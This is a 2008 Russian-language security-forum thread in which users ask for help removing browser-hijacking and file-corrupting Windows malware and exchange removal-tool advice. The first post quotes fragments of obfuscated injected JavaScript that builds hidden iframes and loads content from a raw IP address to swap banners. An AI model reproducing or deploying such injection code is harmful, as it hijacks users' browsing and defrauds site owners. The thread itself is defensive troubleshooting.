Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   Подцепил вирус. нужно лечение. (https://forum.antichat.xyz/showthread.php?t=71987)

AFoST 29.05.2008 23:58
Подцепил вирус. нужно лечение.
 
стоит WinXP. Недавно подцепил какую-то херню. Вирус проявляется в том, что
1)все соединения запрошенные через броузеры отправляются от имени эксплорера. если эксплореру не давать права отправлять запросы-то броузер попросту не открывает страницы.
2)к каждой странице добавляется яваскрипт-код весьма большого веса. Причем после конца документа. содержание примерно такое:
Код:
</body>
</html>
<script type="text/javascript" language="javascript">

    var  AVidFwCHAppNSQXBd=  657 - 30606;
    jYwJhMaYgnUJDUaWHkK = window.onload;
    var oDCQtBcAmfBrLVe =6051 + 9815;
        window.onload = vQtxWTsaEYvWmWG;
        IuGdoqVmjGlcsEPFmVl = 19119;
       
    QgVxFTkTaUKEoKOQ = "";
    var  pcBrqcvdVKCNJBqod=  8777 - 1125;
    xfdNKBQaIwxewaDji = "";
    var EoLCbbpddxQpDnmE =31400;
    AxkgATsgBjXTMbgP = "";

...
...
...

var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b720x300", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};LxwmQqbwQvgXoXOcMF.push(element);
jkrByjMmjyMUFJjm.push(CreateyoVcLstievvEmDpject_24578457887(
'b720x300',
'http://85.12.43.83/fls.geo/HK_720x300_1.html?a=b',
'720', '720', '300', '300',
'',
''));

...
...
...

function rgpnQIURcMJqLABW(yoVcLstievvEmDpj)
        {
        var  dwkIsJxiemdLOHsvD;
                var QwmhGWqlhFNcDDGREQ = document.createElement("IFRAME");
                uQNeqLfJMQjKDvIHc =14043 + 23606;
                QwmhGWqlhFNcDDGREQ.id = yoVcLstievvEmDpj.FrID;
               
                QwmhGWqlhFNcDDGREQ.name = yoVcLstievvEmDpj.FrName;
                var  VJCWjHMbmWSGgSQrS=  9804 - 3054;
                QwmhGWqlhFNcDDGREQ.framespacing = yoVcLstievvEmDpj.FrSpacing;
                AoGBPeUgtvOYDlyH =30686 + 26984;
                QwmhGWqlhFNcDDGREQ.frameborder = yoVcLstievvEmDpj.FrBorder;
                var PmHnbBFMohbAVNtS =12018 + 6157;
                QwmhGWqlhFNcDDGREQ.scrolling = yoVcLstievvEmDpj.FrScrolling ;
                var JoUkNgWNPNIgjdMwQ =11385 + 14775;
                QwmhGWqlhFNcDDGREQ.width = yoVcLstievvEmDpj.FrWidthMin;
                var  CdVSHkhAKhMKAQfat;
                QwmhGWqlhFNcDDGREQ.height = yoVcLstievvEmDpj.FrHeightMin;               
                xrtWnsHoNvYDRyrv = 26284;
                QwmhGWqlhFNcDDGREQ.marginWidth = "0";
                gNALKqVNlcgxptLww = 12459;
                QwmhGWqlhFNcDDGREQ.marginHeight = "0";
               
                if(!QwmhGWqlhFNcDDGREQ.frameborder || QwmhGWqlhFNcDDGREQ.frameborder == 'no')
                {
                var oQoHUoKwdVCnsuxuW =15045 + 22871;
                    QwmhGWqlhFNcDDGREQ.style.borderWidth = "0px";
                    var  edPbIDDhuKTTYdxRGW;
                    QwmhGWqlhFNcDDGREQ.frameBorder = '0';
                    var  qiSeLugrjBiiQFlw;
                }                       

...
...
...
3)Заметил, что эта суко на некоторых сайтах меняет баннеры на свои. возможн пересылает куда-то данные форм и куки...
4)в автозагрузке появились лишние длл"ки. Удаляю, при загрузке винды они появляются снова.

Фаерволл оутпост и антивирь нод32 с полными обновлениями молчат.
Нужна помощь.

Scov 30.05.2008 00:03
У нода полные обновления с офф сайта? или зеркала
2.А, что если загрузиться в safe mod и просканить чем нить типо Sysclean
3. У Аваста например есть сд версия, тобиш грузишся с диска и сканеш хард
http://avast.ru/avast_BART_CD_download.htm

GALIAFF 30.05.2008 00:05
неплохо иметь в хозяйстве procmon regmon filemon, ну и хороший антируткит gmer(показывает скрытые файлы/ключи в реестре/и т.д)
посмотри что в сервисах, может есть что левое.

AFoST 30.05.2008 00:15
Цитата:
Сообщение от GALIAFF
неплохо иметь в хозяйстве procmon regmon filemon
ссылочку плз)

Цитата:
Сообщение от Scov
У нода полные обновления с офф сайта? или зеркала
2.А, что если загрузиться в safe mod и просканить чем нить типо Sysclean
[/URL]
1)с оффа
2)ссылочку плз)

Scov 30.05.2008 00:22
http://www.trendmicro.com/download/dcs.asp

на аваст ссылка выше)

spider-intruder 30.05.2008 00:54
антируткит gmer - ЛАЖА!!!
юзай RkU
Накрайняк AVZ

neprovad 30.05.2008 02:07
поделись подозрительными dll, мне интересно стало что это за живность

AFoST 30.05.2008 02:13
уже поздно...вылечился...

GALIAFF 30.05.2008 11:08
Цитата:
антируткит gmer - ЛАЖА!!! юзай RkU Накрайняк AVZ
хех) если уж на то пошло - то все это лажа ;)

N1K70 30.05.2008 11:29
GALIAFF, avz элита среди этой лажы :) (так сказать, элитная лажа :)))

Fes 04.06.2008 07:23
недавно столкнулся с такой проблемой:
по просьбе знакомого зашел посмотреть компьютер который "стал работать не стабильно" с его слов выражалось это в следующем
1) все файлы *.doc, *. xls на диске имеют одинаковый размер и содержут тройственную надпись "Скупой платит дважды" на зараженной машине нашел файл windowssyystem32 mshost.exe так же он висит в процессах размер его 192512 б при добовлении любых носителей выкидывает 3 скрытых файла autoerun.inf *.exe : открыть.exe , последний не отображается и MFT$ не прописан у всех файлов размер 192512 б. При попытке что либо поднять из документов разными способами ни чего не получилось. Как поднять информацию?

0verbreaK 04.06.2008 15:45
Цитата:
Сообщение от Fes
недавно столкнулся с такой проблемой:
по просьбе знакомого зашел посмотреть компьютер который "стал работать не стабильно" с его слов выражалось это в следующем
1) все файлы *.doc, *. xls на диске имеют одинаковый размер и содержут тройственную надпись "Скупой платит дважды" на зараженной машине нашел файл windowssyystem32 mshost.exe так же он висит в процессах размер его 192512 б при добовлении любых носителей выкидывает 3 скрытых файла autoerun.inf *.exe : открыть.exe , последний не отображается и MFT$ не прописан у всех файлов размер 192512 б. При попытке что либо поднять из документов разными способами ни чего не получилось. Как поднять информацию?
Воспользуйся far для удаления/изменения файлов типа autorun.inf, process exlporer - для получения путь запущенного модуля, вопрос не понятен.

AHTOLLlKA 04.06.2008 15:53
кто советует гмер..
пф... нестабильная фигня ... сколько раз меня в бсод брасала..
avz спасет тебя .. а яндекс поможет найти avz ))

Fes 05.06.2008 10:49
проблема уже свершилась спасать не от чего!!! вопрос в другом в начальной части файла где содержится информация о размере файла его структуре и прочие служебные данные лежит информация не цензурного содержания!!! размер файлов один! возможности сравнения контрольных сумм нету! нужна программа дешифратор или что-то вроде неё от вируса избавиться не проблема проблема, в том как восстановить информацию??

Грот 09.06.2008 12:28
N1K70

avz чистенько меня спасала, что не знаю лажа или нет.
там много полезных функций против заразы и рутиков.

Fes 29.06.2008 11:23
решением проблемы является простой инженерный калькулятор ищем место где храниться информация о размере файла в Hex редакторе заменяем на необходимое значение и почти все далее все идет как по маслу почти все поднял


Время: 22:39